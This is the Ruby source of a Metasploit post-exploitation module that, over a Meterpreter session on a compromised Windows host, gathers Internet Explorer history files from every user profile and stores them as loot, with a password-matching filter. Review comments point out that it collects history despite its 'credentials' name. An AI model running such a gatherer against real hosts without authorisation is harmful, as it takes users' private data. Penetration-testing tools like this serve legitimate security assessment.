rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/ie.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Artifact map passed to run_packrat for every user profile.
  #
  # NOTE(review): the only entry is the Internet Explorer history file
  # (index.dat, dir 'History', path 'LocalSettings'). No credential store is
  # listed, so what this module collects is browsing history even though its
  # name and description say "credentials". How Packrat resolves :path and
  # interprets :credential_type is not visible in this file.
  #
  # freeze is shallow here: the nested array and hash remain mutable.
  ARTIFACTS = {
    application: 'IE',
    app_category: 'browsers',
    gatherable_artifacts: [
      {
        filetypes: 'web_history',
        path: 'LocalSettings',
        dir: 'History',
        artifact_file_name: 'index.dat',
        description: 'IE history',
        credential_type: 'dat'
      }
    ]
  }.freeze

  # Registers the module metadata and the operator-facing options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Internet Explorer Credential Gatherer',
        'Description' => %q{
          This module searches for Internet Explorer credentials on a Windows host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    # The enum values are derived from ARTIFACTS so the option cannot drift
    # from the artifact list; 'All' is placed first and is also the default.
    artifact_choices = ['All'] + ARTIFACTS[:gatherable_artifacts].map { |artifact| artifact[:filetypes] }.uniq

    register_options(
      [
        # In Ruby `^` anchors at the start of every line, so the default
        # matches any line that begins with "password".
        # NOTE(review): how Packrat applies REGEX to a 'dat' artifact is not
        # visible in this file.
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        # Both switches default to true, so per their descriptions artifacts
        # are stored as loot and extracted data is written to a separate file
        # unless the operator turns them off.
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', artifact_choices])
      ]
    )
  end

  # Prints the active filter settings, then calls run_packrat once for each
  # user profile returned by grab_user_profiles.
  def run
    print_status('Filtering based on these selections: ')

    selection = datastore['ARTIFACTS'].capitalize
    print_status("ARTIFACTS: #{selection}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

    # One Packrat pass per profile, always with the full ARTIFACTS map; any
    # filtering by the ARTIFACTS option presumably happens inside Packrat.
    grab_user_profiles.each { |profile| run_packrat(profile, ARTIFACTS) }

    print_status('PackRat credential sweep completed')
  end
end